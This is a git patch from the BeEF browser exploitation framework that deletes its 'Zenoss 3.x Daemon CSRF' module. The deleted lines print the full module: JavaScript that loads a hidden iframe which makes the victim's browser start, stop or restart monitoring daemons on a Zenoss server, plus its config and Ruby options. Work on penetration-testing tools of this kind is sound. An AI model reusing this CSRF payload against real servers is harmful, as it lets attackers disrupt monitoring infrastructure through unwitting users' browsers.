From 61e63370467fd81032a74be2360cbdafd725793f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 12:14:27 +0930
Subject: [PATCH] Remove zenoss_daemon_csrf module

---
 .../exploits/zenoss_daemon_csrf/command.js    | 23 -------
 .../exploits/zenoss_daemon_csrf/config.yaml   | 15 -----
 modules/exploits/zenoss_daemon_csrf/module.rb | 60 -------------------
 3 files changed, 98 deletions(-)
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/command.js
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb

diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
deleted file mode 100644
index 7b90a1a88..000000000
--- a/modules/exploits/zenoss_daemon_csrf/command.js
+++ /dev/null
@@ -1,23 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-  var base = '<%= @base %>'; 
-  var service = '<%= @service %>';
-  var action = '<%= @action %>';
-
-  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
-  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
-
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
-
-  cleanup = function() {
-    document.body.removeChild(zenoss_daemon_iframe);
-  }
-  setTimeout("cleanup()", 15000);
-
-});
-
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
deleted file mode 100644
index c93db9f5b..000000000
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        zenoss_daemon_csrf:
-            enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
-            authors: ["bcoles"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
deleted file mode 100644
index eb9c642e1..000000000
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ /dev/null
@@ -1,60 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end